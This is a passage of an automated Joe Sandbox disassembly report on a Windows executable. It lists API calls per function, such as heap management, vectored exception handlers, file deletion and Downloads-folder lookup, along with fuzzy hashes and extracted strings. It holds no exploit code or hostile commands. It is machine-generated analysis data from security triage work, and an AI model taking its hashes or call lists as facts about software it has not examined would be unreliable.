                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                                                                • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                                                • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                                                                • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                                                                • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
                                                                • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                                                • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                                                                • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                                                • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                                                                • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                                                                • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                                                • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                                                • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                                                                • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                                                • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
                                                              • HeapDestroy.KERNEL32 ref: 000000014000124C
                                                              • ExitProcess.KERNEL32 ref: 0000000140001258
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
                                                              • String ID:
                                                              • API String ID: 1207063833-0
                                                              • Opcode ID: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction ID: 5ef5c56730dbad915fac233b77092dd37bc53bc4ec3343fa221c1b372e2f6746
                                                              • Opcode Fuzzy Hash: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction Fuzzy Hash: 9D510AF0A11A4081FA03F7A3F8527E926559B9D7D0F808119BF1D1B3F3DD3A86598B22
                                                              APIs
                                                                • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
                                                              • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
                                                                • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
                                                                • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
                                                                • Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
                                                              • String ID:
                                                              • API String ID: 547990026-0
                                                              • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
                                                              • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionHandlerVectored$Remove
                                                              • String ID:
                                                              • API String ID: 3670940754-0
                                                              • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
                                                              • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348

                                                               Control-flow Graph (image not preserved; recovered block edges): 14000da6c-14000da80 branches either to 14000da9f, which falls through to 14000daa1-14000daa6, or to 14000da82-14000da85; from there control goes either directly to the DeleteFileW block (14000da92-14000da9d) or first through the SetFileAttributesW block (14000da87-14000da8c) and then to DeleteFileW; the DeleteFileW block continues to 14000daa1-14000daa6.
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDelete
                                                              • String ID:
                                                              • API String ID: 2910425767-0
                                                              • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
                                                              • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$CreateValue
                                                              • String ID:
                                                              • API String ID: 493873155-0
                                                              • Opcode ID: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction ID: 66307e28580f649ba8418ae6b9c958ace7f1b69875393c61862d084d03b91818
                                                              • Opcode Fuzzy Hash: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction Fuzzy Hash: 9ED0C939A1175092EB46AB72AC5A3E922A0F75C3C1F901819B70907775DF7E81956A00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: DestroyFreeHeap
                                                              • String ID:
                                                              • API String ID: 3293292866-0
                                                              • Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                              • Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
                                                              • Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                              • Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocFreememset
                                                              • String ID:
                                                              • API String ID: 3063399779-0
                                                              • Opcode ID: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                              • Instruction ID: 5c5c97092251ccb6e51d21bc2c296289ab600fd53c4e4fe069e69402a2a58e68
                                                              • Opcode Fuzzy Hash: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                              • Instruction Fuzzy Hash: F7213B32601B5086EA1ADB53BC41799A6A8FBC8FD0F498025AF584BB66DE38C852C340
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeapValue
                                                              • String ID:
                                                              • API String ID: 2362848668-0
                                                              • Opcode ID: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
                                                              • Instruction ID: d5031950f6f24f379c2142eebe898701a91e7a03f91a2b9bee16bac6c279ab43
                                                              • Opcode Fuzzy Hash: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
                                                              • Instruction Fuzzy Hash: 2D219676609B44C6CB20CF5AE49025AB7A0F7CCBA8F144216EB8D43B78DF79C651CB40
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CloseFreeHandleHeap
                                                              • String ID:
                                                              • API String ID: 1642312469-0
                                                              • Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                              • Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
                                                              • Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                              • Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                              • Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
                                                              • Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                              • Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID:
                                                              • API String ID: 1431749950-0
                                                              • Opcode ID: f36f728fb68e9c030c92917883890652b287511953764533778c77d950d1811c
                                                              • Instruction ID: ab6ea35cc4c4ca181117cfceb55a371778b923cb2c6d718499f93cc637994782
                                                              • Opcode Fuzzy Hash: f36f728fb68e9c030c92917883890652b287511953764533778c77d950d1811c
                                                              • Instruction Fuzzy Hash: 3BC08CA0B1370082FC0FD30BAC943E022E16F0D3C1EC04129AA0C0B338EB3D80944700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Free
                                                              • String ID:
                                                              • API String ID: 3978063606-0
                                                              • Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                              • Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
                                                              • Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                              • Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                              • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
                                                              • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                              • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CreateHeap
                                                              • String ID:
                                                              • API String ID: 10892065-0
                                                              • Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                              • Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
                                                              • Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                              • Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionHandlerRemoveVectored
                                                              • String ID:
                                                              • API String ID: 1340492425-0
                                                              • Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                              • Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
                                                              • Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                              • Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: c164aa80badfc177248d89438e49745db99a56b8fb9d29675fc464102b6282a0
                                                              • Instruction ID: b586a9c78aaa43fddf3ec091a8dff657c7d1e7c92e3b3169bdbbaf5832d2cb3a
                                                              • Opcode Fuzzy Hash: c164aa80badfc177248d89438e49745db99a56b8fb9d29675fc464102b6282a0
                                                              • Instruction Fuzzy Hash: ACD06C36614B84C3CA249B06E85135973A0F788B88F900215EA8D0B734CF3DC222DB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
                                                              • String ID: BUTTON$C$EDIT$P$STATIC$n
                                                              • API String ID: 9748049-1690119102
                                                              • Opcode ID: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                              • Instruction ID: f11a45e4f50ece19de517c67b98e9e797584e7b20c87343cc1d5b6865565d8d0
                                                              • Opcode Fuzzy Hash: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                              • Instruction Fuzzy Hash: 4DD134B5605B4086EB12DF62F8447AA77A5FB8CBC8F444129EB4A47B79DF7DC4098B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                              • API String ID: 0-4074041902
                                                              • Opcode ID: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                              • Instruction ID: dac418b812a3de41c7c7b5072b67fa498c356b49e4a588b682982c80ed946ec6
                                                              • Opcode Fuzzy Hash: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                              • Instruction Fuzzy Hash: 4DF19C726007508BEB268F1AC48CBAE3BE6F7487C8F064519EF8A4B7A4DB76C555C740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                                              • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                              • API String ID: 217932011-4219398408
                                                              • Opcode ID: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                              • Instruction ID: 4189c401249be1c18680961fdd5f00b64fd9ff4c66db3fab09ee0cba437a9a89
                                                              • Opcode Fuzzy Hash: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                              • Instruction Fuzzy Hash: 6C418F72211B4086EB16EF12F8447EA73A4F78CBC8F544125EB49477A5DF39C55AC700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                              • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                              • API String ID: 1740785346-287042676
                                                              • Opcode ID: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                              • Instruction ID: 39544a34e48b1591535f5ec23c8084432afafb0fbbbedabb5ee694640fe7ccea
                                                              • Opcode Fuzzy Hash: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                              • Instruction Fuzzy Hash: A94184B1214A46C2FA26EB57B4A4BF97291AB8C7D0F540127BB0A0B7F5DEB9C841C610
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                              • String ID:
